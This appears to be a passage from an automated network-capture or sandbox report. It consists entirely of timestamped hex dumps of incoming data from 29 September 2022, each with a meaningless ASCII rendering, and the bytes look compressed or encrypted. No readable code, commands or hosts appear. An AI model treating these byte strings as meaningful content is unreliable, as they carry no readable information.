                                                                                                                                                2022-09-29 12:51:28 UTC5247INData Raw: fa 4f 54 f4 0c a6 41 ef 84 39 ff 4c e9 11 66 84 79 95 45 99 d5 00 6d d3 32 03 3e 1a 5f 15 9f 86 58 2b 03 39 03 e2 d5 ee ed 70 a5 b3 e8 6c f6 59 ea f5 cc 9c ac c1 48 a8 98 25 b4 60 2d c7 dd 3d b8 dd 97 9b 32 9e 36 29 f7 fc a2 1e eb d0 ba 93 07 44 e5 65 f6 54 60 fd a9 8d 0b 85 be f4 27 f7 d2 6b fc 5b 79 00 fc 52 22 23 23 77 83 f9 00 7a 5d 08 7b a2 f6 58 12 d0 ba f0 84 f0 3d 72 ee ba e9 49 1c 6d c6 f4 8b 76 c2 ae 5e 12 d4 7a 2d 20 74 f3 a7 2b 78 e0 26 86 8d 28 9b a1 4f f6 3c 4d c0 cf ea ed 4e 71 a5 c9 e1 80 f8 a3 ec 94 ca 38 70 73 3c 60 37 01 4e d6 c5 bd ed c0 60 bc 13 ea de ec 40 ca 45 ed a4 c2 c5 ff ee cb 45 e4 15 29 94 46 5a f0 0e e2 7b 2c 38 bf d1 f7 ba 92 b8 7a 9f 49 be 17 8a f0 5c 77 55 b1 48 4a f6 d8 3d 79 e8 a4 6f 59 de 1a 08 24 c8 fc 10 58 73 5d a7
                                                                                                                                                Data Ascii: OTA9LfyEm2>_X+9plYH%`-=26)DeT`'k[yR"##wz]{X=rImv^z- t+x&(O<MNq8ps<`7N`@EE)FZ{,8zI\wUHJ=yoY$Xs]
                                                                                                                                                2022-09-29 12:51:28 UTC5263INData Raw: 56 d0 5d dc e4 85 79 19 89 bf a1 79 9a de 42 0f 1c 50 1b 74 fe f8 a1 19 f9 c3 28 ef b5 6e 0b f5 ca c3 f0 86 c8 7c 8b 7d a1 5c 07 5c 4b 54 7d 57 fd 04 e8 dd 48 31 6b 11 63 d9 3b eb c6 29 5b 2b 66 99 48 32 56 a9 0d 87 06 fa 64 0a f6 10 83 a9 33 ac 38 45 44 2f a6 2f 7c 63 0d 3c f6 eb 9c d7 50 c9 4d 90 3a 78 39 84 0f e5 2e 65 98 65 ee 87 a1 79 76 12 a7 67 ca 55 eb ed b8 17 a7 d7 8d 12 ee c6 89 d0 3c 93 1e 33 af 20 7b 92 96 6f fe d5 24 22 5f e8 38 49 89 8b c1 b4 19 01 34 f1 41 2e c1 a3 12 0c 43 28 54 77 b7 e0 33 5d e3 f4 f1 91 45 4b 38 15 7d f9 ce 64 a6 88 36 80 97 44 d6 d1 f3 86 19 76 66 11 8f e9 a6 d8 92 aa 46 b8 ee 4d 9e c0 47 86 9c 10 61 a4 a2 85 38 1a 47 7c 04 b5 ba d4 03 02 5f 6a 4b fa fb d6 86 8c dd 92 53 3f 54 17 f8 8b 2e e8 34 dc 12 0a 7d 5f 86 76 c1
                                                                                                                                                Data Ascii: V]yyBPt(n|}\\KT}WH1kc;)[+fH2Vd38ED//|c<PM:x9.eeyvgU<3 {o$"_8I4A.C(Tw3]EK8}d6DvfFMGa8G|_jKS?T.4}_v
                                                                                                                                                2022-09-29 12:51:28 UTC5279INData Raw: dc 0a aa b0 26 26 6f 41 1c ad a0 88 a6 7c f6 4f 00 df 7c 34 02 f3 ef fb b4 70 48 dd 1c 1a f2 60 ec cb 3b 20 bc 94 98 41 fa 38 92 0b d7 00 17 2a 21 f4 98 e9 f8 d5 81 46 58 94 11 17 54 84 c6 d5 98 6b 80 8a 1a 3c fb b7 f9 fc e7 d5 b7 88 4e f6 56 39 e8 ef 32 98 65 eb c5 b1 af 41 6a 3d e1 e6 f1 9f 0a 7a 07 a8 f6 54 67 66 5d 2f 6f bb 6a 8e 10 06 e8 e7 7e 32 83 98 64 ae 2a 7b 2b b6 f3 76 90 8a 7a ed 5b 37 15 49 f1 99 a7 7b 87 88 28 6d a4 53 ba 97 d4 85 fa 38 fd 75 0e c6 87 14 bc c6 c4 30 9c 5e f8 b8 4d 03 af c7 ab ec ec 1d 23 ba 5f af eb 9e 16 c4 a3 57 1d be 02 b4 3a 61 8c 3c c1 aa fa f4 15 81 3b 17 dc fe f7 76 d7 22 da 30 52 9e 09 3a be db cc e1 0d 87 15 51 62 9c 67 d5 83 1e 94 a9 d4 f6 32 7d 76 d0 b7 dd e1 c3 e7 19 a2 86 0e 86 93 c8 e9 45 0f 57 bb 72 d9 21 8f
                                                                                                                                                Data Ascii: &&oA|O|4pH`; A8*!FXTk<NV92eAj=zTgf]/oj~2d*{+vz[7I{(mS8u0^M#_W:a<;v"0R:Qbg2}vEWr!
                                                                                                                                                2022-09-29 12:51:28 UTC5295INData Raw: bf a8 fa 8e db dd 1e 64 dc 56 25 bc fc 35 a6 10 59 fa 9f 8f 94 1f af fc af 00 ef c6 b6 53 9b 57 05 3e d9 ce ca dc 00 22 89 a8 4d 34 b2 ca 65 6a 5e 1e f3 28 18 30 ce dd dc 97 4e 38 b1 f2 5d 78 f1 b6 a2 e0 63 5c 1c d7 dd 8f 96 22 27 aa 7a 72 67 d0 31 68 0d 76 06 9a ab 17 f5 fe 19 08 33 4b 36 7e 18 6a a7 fa 11 a6 bd aa 86 f5 c6 b9 3c 3e e0 8d bf 6f 41 6a 68 46 e2 95 a9 2c 93 4f 2c ab 84 65 1e db 63 a3 05 e0 a0 78 69 9d 0f 8e c6 df 7f 91 31 e8 6d 4c 38 cb 34 34 c9 f9 b7 41 5d 79 dd 63 2c ca 6c ad 63 9c ea 02 87 d5 82 9d 01 95 32 68 a5 c8 56 72 84 f0 80 d7 04 70 a9 c6 7c a8 ae 2b b3 16 87 4e 51 41 46 8d 47 d9 51 7d 7e ad f2 8f 48 7b 3b 84 72 33 8e 3e d3 65 ad 28 81 81 df 3a 50 23 7c ef bc 28 24 1c 19 86 ce 2e 24 67 f4 cf e7 5c 9f 64 db d2 0f 87 c2 b5 3b 47 0f
                                                                                                                                                Data Ascii: dV%5YSW>"M4ej^(0N8]xc\"'zrg1hv3K6~j<>oAjhF,O,ecxi1mL844A]yc,lc2hVrp|+NQAFGQ}~H{;r3>e(:P#|($.$g\d;G
                                                                                                                                                2022-09-29 12:51:28 UTC5311INData Raw: d7 83 74 e5 fd 61 13 14 0f cc 96 f0 ba d2 45 e0 aa a5 22 23 3e a4 f8 89 ca 6a e6 4b ba e8 84 d1 b8 33 59 75 8e 47 3d fb e6 17 2d ce 96 dc 8a 96 49 ab ff b4 83 b9 97 16 f0 5a 74 e7 01 0d e6 47 9c 64 be c9 34 e7 e7 7e 3f 55 23 86 c9 cb a3 57 30 8e dc ac 68 87 a1 78 80 65 0e 42 f1 53 07 6b e4 ed 92 39 7e b8 7a 72 65 ab 94 07 ca fa 91 7b 76 31 65 5b e4 5d 9f 6b aa 11 1e 21 bf 7c 74 36 c0 f2 f2 47 38 5b 17 45 bf 4b b4 58 f3 67 72 19 90 a4 41 59 7c a9 86 3e 43 f6 64 b1 3d 10 1b 48 47 1f e5 49 e7 d2 65 b3 69 0c b5 0f e1 33 f8 97 80 fc 89 ce 83 9b 3a 2c 50 c9 83 55 46 3b 98 e8 4a 40 76 cb 25 f4 d8 66 11 aa d0 d7 d5 24 f3 07 e9 c3 d6 d6 7d fe 8d cf 09 88 cb f4 e4 d5 c0 86 c9 8d df 8b c7 ff 96 45 4c f4 f3 08 f9 d8 ce 1e c5 b7 02 e6 ab 9e cb ec a9 e6 4d 2b b6 92 02
                                                                                                                                                Data Ascii: taE"#>jK3YuG=-IZtGd4~?U#W0hxeBSk9~zre{v1e[]k!|t6G8[EKXgrAY|>Cd=HGIei3:,PUF;J@v%f$}ELM+
                                                                                                                                                2022-09-29 12:51:28 UTC5327INData Raw: a1 57 d0 0b d2 0f 71 32 4b d2 1a 08 fe 1b ce 78 95 ba 63 c1 44 57 21 45 5d d5 83 e9 f8 fd 98 b4 ac e2 e3 c9 79 60 49 6d 09 ea ce 18 c6 a4 12 99 e2 7f c9 08 f8 38 64 63 fe 01 02 51 9c c0 74 a0 1a ec 4b 3b 43 58 b1 a3 8c cf d1 e9 b8 ce a4 58 9c c9 5d e7 9b 64 12 fa e8 e7 58 3d 62 9b ce 4a 93 6b da 0b e7 4a a3 8f ec 48 13 ac b6 02 3c 4e 8a e0 b1 fb 38 bd 20 ea 33 34 4b a5 ae 04 91 77 e1 29 4a 0e 75 66 29 d6 56 b2 f5 fc 8e 8d 52 15 28 fa e5 f4 18 32 e5 91 2c 1d 28 c2 94 bd 54 cc 7f f1 9f b6 65 ef 30 a3 b2 51 6e d5 a6 3c 44 17 1e 44 1f bf 8d 04 40 66 71 04 32 3b 5f 3f cb 15 d1 fd 2e 60 43 dc b3 e2 e3 82 b3 8a 0c 64 7c 71 34 78 e4 dc 28 bc 1a cf eb 87 4b cb 15 1c 71 9b b1 76 71 c1 ae 80 9a 46 97 cf da a1 97 20 b1 da ec 25 7b d9 47 bc 21 3a c1 ed bf 5c e6 c3 da
                                                                                                                                                Data Ascii: Wq2KxcDW!E]y`Im8dcQtK;CXX]dX=bJkJH<N8 34Kw)Juf)VR(2,(Te0Qn<DD@fq2;_?.`Cd|q4x(KqvqF %{G!:\
                                                                                                                                                2022-09-29 12:51:28 UTC5343INData Raw: b5 3d d4 ba f9 fd 19 5b 3c 98 c8 86 98 b8 73 c3 db 0f cb a6 3b 22 33 a4 93 cd a5 a3 ef ad c3 cb 0e 79 93 6d da 02 ee 4a 46 a9 73 b2 ea 3d 7f 30 8f 44 1d 50 c7 c4 a4 d8 58 0a f2 ae bd 40 87 d7 7d 76 63 9f d0 3d 91 8b 03 c7 6d e1 c8 62 c9 a2 2b ec 57 e9 ae ec 01 7a 3c c9 9a 9d a8 68 a3 72 6f 16 70 25 d9 46 a0 78 7f 5b bb 1d 33 37 fe 4a 28 f6 79 47 02 50 92 35 14 c2 1a 0b 30 48 82 26 e4 91 9c 75 a7 17 5a 93 3a cb 8e 63 8a 7e 94 b6 50 c8 71 b0 c2 37 72 33 75 06 f2 5f c7 98 7a 3c 4d 7f f0 d3 49 52 bb 10 42 10 2a cd 84 3d 61 8b 5c 75 87 10 4d 4d ec 0a b8 0b 33 0f 5b 6b 0c 12 0b da 3b 81 17 2e 8c 8e ed 68 2e 0f 94 21 5c 8f 1c 3f 6f 2c 5d 95 61 ed a1 97 43 24 21 2c de ce a4 41 61 45 3c ac 75 03 83 b9 4c 26 ce e2 38 b8 9a 20 91 29 b3 b0 4e 4c 67 f6 8b 8d 47 8c 19
                                                                                                                                                Data Ascii: =[<s;"3ymJFs=0DPX@}vc=mb+Wz<hrop%Fx[37J(yGP50H&uZ:c~Pq7r3u_z<MIRB*=a\uMM3[k;.h.!\?o,]aC$!,AaE<uL&8 )NLgG
                                                                                                                                                2022-09-29 12:51:28 UTC5359INData Raw: 59 6a 95 92 64 d2 b2 93 21 d5 b4 84 5e e8 0f ae d5 63 53 cd f2 46 b9 fc d2 11 f1 86 83 83 32 3f f3 a8 75 2a 64 3f fe 84 52 ea 91 d8 d3 c2 16 2d b8 64 05 1f 1a 19 67 98 e9 12 e6 a6 b0 97 64 6e d2 d5 90 93 2b 02 56 bb f1 82 2f 93 6e f3 09 ce 15 8c a6 6d 8c d1 64 c8 56 e8 a3 7e 30 3b a0 be 27 ad 2a ef 7b af 1a 46 8a 43 d7 fd 66 f0 1b 77 20 a9 45 cf 6d d7 8d 79 fd 1c 41 57 b3 13 19 73 bf 14 75 a6 12 23 59 27 4c 47 67 b1 38 3b 09 3b 72 0f 80 ae e4 92 0b 82 44 90 6e d1 d7 f2 ae c2 e1 40 4a 41 51 a1 da a9 74 3a cf 29 51 5d eb e5 9e 6f c8 e6 21 e1 3e 68 bb d8 4d 82 9e a2 77 54 b4 6e ad e6 dc 63 14 68 eb c3 fd 94 a0 48 c9 2c a3 4e dd 9c ed 1c fe d8 03 64 f8 0a 9e b8 bb ff 7a 70 68 09 c1 a6 e0 a2 29 e8 01 39 2f b8 e0 48 6e f2 4d ba 5d e3 7d b5 3f 3c cd 91 7d 64 47
                                                                                                                                                Data Ascii: Yjd!^cSF2?u*d?R-dgdn+V/nmdV~0;'*{FCfw EmyAWsu#Y'LGg8;;rDn@JAQt:)Q]o!>hMwTnchH,Ndzph)9/HnM]}?<}dG
                                                                                                                                                2022-09-29 12:51:28 UTC5375INData Raw: 76 34 aa e9 f2 e1 db e1 84 85 17 87 a5 6f 85 be 03 46 5a ec 71 a1 e0 dc c6 f9 36 c7 3e fc 94 a5 09 0c 35 6c 58 b6 25 5f 66 c8 58 1c 81 0e 1b c1 6d fc 5c 2f da 31 b0 f3 66 1c 0f 65 54 b9 03 17 43 ef 18 59 29 ea ee d5 f8 cd ed a3 d4 53 2a d0 4c 0e 4b 33 ba 5f 42 43 28 2b c8 99 f5 e8 5b 85 66 87 42 d8 94 18 fe af c9 a4 6c 79 7a c1 c3 36 99 e1 02 63 87 e2 2d b7 86 9b 1b b5 1f a7 36 cb 84 00 6e 42 8b 8d 1e de 2f 8b 0b 12 78 f3 60 83 67 cc 22 1c e5 0c 7d 80 64 a7 95 9a cc ed 96 43 22 6d fe 1e 76 8a 4c 2c 34 25 db b1 c9 fd 0a 1a fb a6 18 86 bd a7 e9 91 7c fb 84 d3 a1 e9 f9 ea 1b 6d be b6 5e 0e 31 e1 1e 59 41 39 46 b8 7f 2e b4 12 73 a0 d9 14 bf 99 f0 68 7e ff 1f b5 29 ef f5 68 42 06 cd 04 71 ad c4 8f 46 db 19 22 f3 af 21 ee 76 02 ee 0d 58 57 42 e8 1e 32 e1 a8 18
                                                                                                                                                Data Ascii: v4oFZq6>5lX%_fXm\/1feTCY)S*LK3_BC(+[fBlyz6c-6nB/x`g"}dC"mvL,4%|m^1YA9F.sh~)hBqF"!vXWB2
                                                                                                                                                2022-09-29 12:51:28 UTC5391INData Raw: 22 4d 66 5a 56 bc db 36 eb b0 c1 59 dd b0 a4 f7 88 91 18 fe 7f 8a e2 7c 00 3b 9f 35 e5 ee 41 18 13 ed d6 84 80 c9 d3 fd 4c c5 68 49 19 d0 1e 27 5b b6 c6 6e 5e 1c 6e bb f2 47 ee 8c db 7d e5 25 33 6a a0 6c 46 1e 24 f7 d2 f6 52 03 56 a0 06 4a 63 ca 69 de 3a 04 ac d8 2f ed db 85 a1 2b 13 67 cd ec 33 80 de 37 30 bf c2 e8 63 49 b0 9e 87 16 41 04 85 18 ea db 8c f5 d7 15 85 7c c2 05 72 99 d4 a5 21 0d 81 47 66 31 25 61 a5 3d 76 8a 72 74 e0 69 e6 a2 2c ab 89 83 50 ef 28 8b e4 4c 2d d5 0b a8 95 30 15 c6 ee cd 08 86 e9 c7 5b cd 37 5d 46 55 c5 18 04 e3 fd 62 38 6d 19 86 a3 8c a5 ac 1e e1 67 48 c9 ba 9a 34 b6 84 1c e3 eb e1 12 ab 69 27 67 ad ea e1 bc 9a 5a cb 73 e6 dc 72 91 4f 14 9f e1 19 5c 2a 0d 99 05 cc 36 24 e2 67 52 e4 3e 5f 16 55 ad 34 3b 62 b7 1e 19 91 83 0c e9
                                                                                                                                                Data Ascii: "MfZV6Y|;5ALhI'[n^nG}%3jlF$RVJci:/+g370cIA|r!Gf1%a=vrti,P(L-0[7]FUb8mgH4i'gZsrO\*6$gR>_U4;b
                                                                                                                                                2022-09-29 12:51:28 UTC5407INData Raw: 0e eb cc 1e 72 5f ce ca a1 1f 85 ae 8c 7f bc d6 56 71 00 c6 74 0e 56 f7 5c 0f 4a 7d e7 4a dd e0 09 dd f9 fa 6f ba 2f 59 f5 23 b0 12 e9 43 bb 17 69 c8 fc 05 d5 c1 7b bd 2e 8c 4b df d7 4c 0c 40 aa 28 f8 d8 67 7d 9b c4 fd fb 83 9f 0c a7 72 e6 9a 08 55 79 84 0c e8 6e 98 30 11 c4 10 d8 f8 11 9a 29 24 e0 1f 80 9e 8f f8 c2 7f 2e ae 6f 20 59 99 14 13 87 22 a2 ad 25 51 e4 0a af a0 61 fe e3 80 34 3a ed cc c7 7d 0c 7e 77 17 63 f9 9c 4f 3f ad 59 34 1c d8 4a 21 41 26 db c1 e2 a9 28 4c c2 04 11 b5 f2 0e aa b5 84 88 6a 57 0a a4 d3 af 4d b1 5d 60 56 aa 1b 2d d5 a6 61 71 52 95 eb 4b db 63 35 94 f6 f6 7a 64 0c d3 e8 2b a4 1a c7 b5 75 83 b6 14 cb d0 98 af 54 e6 48 cc e2 61 9c c7 58 b3 54 c4 28 f7 ff a6 9e 9e fd 90 46 b9 4a 4f 11 84 1f 80 92 53 f3 58 c1 46 c8 88 88 3d 79 7b
                                                                                                                                                Data Ascii: r_VqtV\J}Jo/Y#Ci{.KL@(g}rUyn0)$.o Y"%Qa4:}~wcO?Y4J!A&(LjWM]`V-aqRKc5zd+uTHaXT(FJOSXF=y{
                                                                                                                                                2022-09-29 12:51:28 UTC5423INData Raw: af d1 b1 51 db 89 f9 15 d6 80 3d df e6 f5 0a 78 0a a1 f9 02 6e 04 9b 5d 9c d2 11 bb 78 99 d1 59 09 33 47 2a 0d d8 68 03 01 82 bc c9 62 58 f2 e9 6c df a3 6d f7 74 a8 7f 4c 4a 66 3c 71 73 e2 f9 34 24 2b c7 bd c0 b2 42 2d ae 71 8f 0d 3f b6 6e 88 1f 51 25 6f a1 62 6f 81 05 b1 aa 82 bd 64 de 8e b7 4f 52 ed 4a b4 22 56 6c 5d 36 af c8 a6 bc 3e 10 35 9d 7b 96 de fb d1 72 b3 0f 92 1f a7 08 d3 0f a1 74 d8 71 c9 89 3e 71 9c 9e 5e ee 19 b5 33 a5 9e 87 7c 78 cc 1c 7c 32 d2 45 f9 87 8f 19 2e 35 18 14 1a ec 91 29 dc ba bd 0c 09 f3 4d 8b c6 86 18 71 75 32 78 bd fa d1 81 88 ae b4 c5 14 97 6a 4e e1 d9 a3 c7 58 05 7c 81 c8 a5 03 1a da 76 b4 dc 3c 1b 9e bf 53 20 5a 4c aa 8b 0a 17 37 76 5b bf d8 30 e1 a5 26 3a 72 ad 62 f2 c9 f5 ff ad dd 3c c5 2b d6 b1 f7 01 e0 a4 03 01 db 73
                                                                                                                                                Data Ascii: Q=xn]xY3G*hbXlmtLJf<qs4$+B-q?nQ%obodORJ"Vl]6>5{rtq>q^3|x|2E.5)Mqu2xjNX|v<S ZL7v[0&:rb<+s
                                                                                                                                                2022-09-29 12:51:28 UTC5439INData Raw: 46 10 6c 53 c2 a5 ae 81 2d c7 94 5d 32 f1 45 17 20 e6 21 92 db e4 3e a7 40 05 21 16 86 04 09 a1 5d d3 84 36 f1 35 53 1d 94 75 34 2d e4 bb 5e 4c 39 bd 89 92 ce 8e 1d a1 f3 4e fb a1 de 78 b9 60 ac e3 a4 40 11 cd e4 f7 3a 94 3d ea fa f4 53 5b 00 76 b6 33 b6 29 6a 91 43 98 85 ed 8c 8e 17 78 af d7 5d 37 76 36 ec b6 e9 43 bf f0 36 11 18 db 7e fe b9 7d 20 a5 25 ee fb 2a 10 8c 43 15 5d e0 6d d7 04 b6 d5 a9 e4 0e db f0 bd d0 3f 1b 55 ec 08 e9 63 48 d6 b0 27 c4 ab 1b b6 61 c3 bc f6 e4 56 eb 78 9d af 07 d0 1c 71 58 2f 28 28 01 ee 45 e9 87 97 04 2a c0 b5 a6 af a0 db 59 9f 51 63 41 07 25 29 0c 03 16 97 8e 9b 2c e3 5d 88 5c c3 1e 95 18 f5 54 ac 5c 6e a2 3e 36 8e 64 5b b7 63 1c 18 0e 60 93 6b 68 31 d4 16 45 98 7a a9 91 d2 46 35 82 8f 16 23 89 51 69 1d 22 31 45 2e cb 0b
                                                                                                                                                Data Ascii: FlS-]2E !>@!]65Su4-^L9Nx`@:=S[v3)jCx]7v6C6~} %*C]m?UcH'aVxqX/((E*YQcA%),]\T\n>6d[c`kh1EzF5#Qi"1E.
                                                                                                                                                2022-09-29 12:51:28 UTC5455INData Raw: 4a 3d 2c c4 81 9a 4c 7c 0f 66 61 81 1e b6 88 fc 44 b2 4e 0a 46 8e 1e 81 aa f4 cf 7c 1c 30 85 d1 13 86 24 e1 8d c3 9a b4 78 9d 68 db 67 48 8f 45 41 28 41 fe b8 4d ef 69 c9 1c bc 1e 6e 71 24 73 08 70 0a 6a 37 20 b6 8e 61 f4 02 91 80 e1 eb 86 7a 5c b7 0e ff aa c5 d9 2a 2d 12 18 ac 92 d9 dd 58 67 82 f7 4c 09 c7 57 ae 74 26 63 75 13 6d 3d 82 e1 e5 ce 15 ce 53 18 f1 ae 89 b4 57 42 b3 a4 dd 96 7e 81 9c a0 f2 fb 4b 2b 50 64 db fe ec 9b 19 b2 36 2e 89 99 26 90 b3 7e 43 4e 91 2f 46 85 7a f5 d1 d8 48 ec 70 22 fc e5 ec a6 90 f6 5b ad ec ce 30 02 67 47 dd 18 b9 69 4c 72 26 a9 5a 65 27 da cc f8 a3 45 73 ea ed d1 a1 f6 d4 60 47 21 72 5f f5 4b fb 72 31 99 ff 49 0a ef 06 14 7d 98 db 39 04 11 c3 c7 ec 7b 3d 67 1a 29 41 98 c7 ef 40 76 c7 7f c7 4a bc 2b 38 95 5a 32 60 79 66
                                                                                                                                                Data Ascii: J=,L|faDNF|0$xhgHEA(AMinq$spj7 az\*-XgLWt&cum=SWB~K+Pd6.&~CN/FzHp"[0gGiLr&Ze'Es`G!r_Kr1I}9{=g)A@vJ+8Z2`yf
                                                                                                                                                2022-09-29 12:51:28 UTC5471INData Raw: 24 72 e6 cd 08 4e e8 9e c3 ad ed 66 ff aa c1 cf 66 45 a2 0a f4 d2 cd c6 ef 37 68 6d a6 d1 c3 9c 40 14 d5 4e 19 f3 be 40 d8 23 2e c1 86 08 64 bd b5 dd 97 79 d6 5d 56 35 1e a2 29 a1 c7 ba 23 ee ee dd 9d 5b 73 b1 89 af 1d c2 6b b7 ba 4e 1c 7b 51 b8 36 bc 5a a5 3b 92 7c 9a cf 0d 08 96 6c a2 ee bd a3 68 4b 00 89 e7 05 a2 7a 3d c0 11 dd 47 64 ba ff b0 0c f1 9f d1 ce 5f 1d 8e e3 60 42 bb 2a 9e 12 f8 5b 2e 03 17 1c 65 de 04 0f 27 2e 68 4e 60 3b 97 5c 5e c5 43 03 69 aa f6 64 fb d0 32 89 7a a6 9c 3e b5 72 8e 0f ba ab e6 d5 5e 1c 0b ad f9 7e af b0 7b df 6e 72 4e 33 49 8e 64 be a2 1b 95 61 b7 4f d6 ed cd bd 45 4f 80 a4 97 b0 8a de fc 3b 5b 3e e7 d2 80 2a cc f0 81 11 2a 77 c1 47 05 2e 62 8f e1 67 80 f9 22 b3 6a 40 dd 4a 60 b6 f2 20 3b 9d 36 8a 15 5c fc fe b9 1b b6 cd
                                                                                                                                                Data Ascii: $rNffE7hm@N@#.dy]V5)#[skN{Q6Z;|lhKz=Gd_`B*[.e'.hN`;\^Cid2z>r^~{nrN3IdaOEO;[>**wG.bg"j@J` ;6\
                                                                                                                                                2022-09-29 12:51:28 UTC5487INData Raw: 2c b8 8f ec fa 5b 15 29 3c 1d 51 b2 8c c9 7f 4b fc a0 a5 0d a7 59 b2 8b 61 63 fb 5a f0 a9 e6 d2 c7 d9 1a 07 65 67 7e 09 2b 2a 57 db cf 03 1a 64 71 77 d6 b5 e9 f9 ce 69 2c b0 4e e6 7a 64 d5 ef 0a 46 b0 32 fb f0 08 42 09 e5 2f 30 94 f7 eb 7d a7 5b 6d 22 5a 86 5a 6a 3a 24 5e 2d ae eb c2 6b 07 48 c8 12 b3 a3 a0 74 f0 ef af 48 30 d9 a6 79 f1 81 eb 3e 26 69 ad 75 7b ac ff 60 b3 80 b7 85 f0 61 ae 94 12 0d 51 bf 2a b8 a2 3a 24 a3 07 6b 48 52 22 37 02 d2 0e f1 57 63 b0 0c 60 40 f1 72 51 22 84 dc e5 b5 d5 7b 35 dd ed b9 df a2 e8 b5 51 89 fe ab dc 07 bd fb 86 49 f1 d1 b3 51 7b ed 13 8b 30 91 60 f0 53 ef 31 87 c2 85 2c b6 80 3d 34 89 0f a2 4c b0 87 73 53 88 19 dc 0c 30 6e b1 c7 77 67 93 86 cc 34 1a 10 7f 44 5b 35 3a a3 39 1f c5 83 72 2a 77 b7 34 3f c3 c2 ab 3a 73 5d
                                                                                                                                                Data Ascii: ,[)<QKYacZeg~+*Wdqwi,NzdF2B/0}[m"ZZj:$^-kHtH0y>&iu{`aQ*:$kHR"7Wc`@rQ"{5QIQ{0`S1,=4LsS0nwg4D[5:9r*w4?:s]
                                                                                                                                                2022-09-29 12:51:28 UTC5503INData Raw: ed 10 0a 26 d9 19 d7 2c a2 63 8c 2e 82 50 b0 bf 06 16 79 17 c0 f5 e8 92 ed 61 a9 e5 87 59 fb 2f 7a 01 86 ad 75 8e 98 5e e5 b2 90 e4 20 82 64 93 4f 91 1b 56 25 e0 0d 45 45 bf 4e 38 04 f3 6b 0c af 02 af be 62 cc 25 bf 24 9b 82 dd 22 70 55 53 de 1d 6c a2 4c d5 e9 d7 34 87 ee ce 6a c2 d8 99 84 15 a2 14 18 63 62 8a be b5 4f d8 9a 2d 9a 59 a9 40 e4 55 b3 33 14 dc 4e f2 83 25 8a 37 c1 96 fa c6 98 9a 7f c9 6b 40 37 60 c8 c5 c3 e7 15 22 45 ca 83 30 a1 b2 6a 5a d2 3e 85 7b a5 e2 00 ad 50 70 8c a8 c2 c7 17 02 fc df 71 87 da 41 dd d6 e8 a3 04 95 a7 f4 32 52 3d bc 76 9f 57 80 e3 66 63 94 5b 28 0e 67 73 1e b8 c3 fe 6d 57 5f 57 ef 5b e9 56 c7 59 95 59 b1 c0 7d 7d b1 c1 0e 33 de 84 cd be 57 6a e1 dc 31 14 d4 22 c6 ce e3 f2 09 91 87 2c 28 18 99 61 56 4c 9a 65 50 7a 38 13
                                                                                                                                                Data Ascii: &,c.PyaY/zu^ dOV%EEN8kb%$"pUSlL4jcbO-Y@U3N%7k@7`"E0jZ>{PpqA2R=vWfc[(gsmW_W[VYY}}3Wj1",(aVLePz8
                                                                                                                                                2022-09-29 12:51:28 UTC5519INData Raw: ff cb a9 28 e9 9a 6d 7c 7f 58 78 3a da e5 9b 0e 88 36 34 af c1 38 c3 b9 84 40 54 72 58 38 f3 b1 ca 3a d5 62 88 12 fe 47 96 41 a7 89 e7 ae 96 44 a4 20 5d 14 51 6d f9 e2 87 fd 07 e2 af 07 dc 20 96 e2 65 7b fc 0f 66 82 e1 da ba 20 15 6d a2 66 03 99 0e 0b 32 56 2c a0 2a 49 f6 0e f6 ce 50 9a 88 9e 15 62 07 14 4d 44 cb f7 72 50 a8 9b 71 5e f7 c8 2e 95 07 a0 62 fc f6 1e 9e 8a bd fa f2 bb 30 21 80 12 89 66 f2 55 c1 1f d5 3e e1 af e6 ee 99 72 21 b5 94 3d fa 0b 5b 94 28 a2 69 fe 96 ed 9c db 7d 8e 77 03 36 f6 47 20 e1 3b d2 cd ed 38 83 70 db fd 78 cb 54 53 84 91 8b 05 ea da 78 2a 6c 6c 39 14 f5 c0 87 4c be de 35 46 77 e0 d5 bb 6e b3 01 0b 56 fb ae 42 29 ac ef 81 3b fc 2a d1 59 04 46 f4 18 01 14 53 8b 55 ae cf d9 4b 1c a0 06 ae 18 5c 2e 73 18 68 49 8b 5f 78 0a 3d 28
                                                                                                                                                Data Ascii: (m|Xx:648@TrX8:bGAD ]Qm e{f mf2V,*IPbMDrPq^.b0!fU>r!=[(i}w6G ;8pxTSx*ll9L5FwnVB);*YFSUK\.shI_x=(
                                                                                                                                                2022-09-29 12:51:28 UTC5535INData Raw: 62 d6 f0 c0 51 a6 c3 63 fe 35 e2 01 25 cf 02 e8 3e 21 4a e9 b6 10 f2 a5 ea 5a 88 24 00 11 0d 09 99 0f 1c 89 8c 91 56 70 a5 6f 1a 7c 30 d0 a0 61 a2 c2 76 4e 79 43 89 21 88 88 08 a3 45 f3 9d e9 ea ea ff d8 8c cd f7 32 d4 5f 49 74 3b b7 b0 fb b4 3b 8e de fa 3b 12 65 98 ba 3f fb c3 27 81 6a 69 5c e7 79 dd de 03 79 c2 03 76 d1 09 1d 0e 40 fe 1c 17 ea 5a bf 66 c9 e2 da 6a 8b 34 e2 08 ac 43 be a1 9e 4c 6f ba e4 55 89 dd 81 43 52 46 ee 8f eb fb a9 1f 33 bb 09 67 7c 2d b0 8f 43 07 32 9f ca d9 ba 46 f4 89 2e 96 27 95 75 23 60 2d a5 86 63 c8 dc ff d3 70 d3 db 6d 5f b1 9b a5 f6 11 cd 42 ff fd ef b9 91 c8 eb 5d d1 a0 96 d0 d3 9a bf 92 c9 74 41 60 a8 3c 48 e1 26 d6 1f 1a c9 6c 8e 9f 43 f9 d0 39 36 08 f3 ba 9c f6 61 23 12 44 62 2d 76 3b 2b c5 4c be 00 04 ab 60 77 48 55
                                                                                                                                                Data Ascii: bQc5%>!JZ$Vpo|0avNyC!E2_It;;;e?'ji\yyv@Zfj4CLoUCRF3g|-C2F.'u#`-cpm_B]tA`<H&lC96a#Db-v;+L`wHU
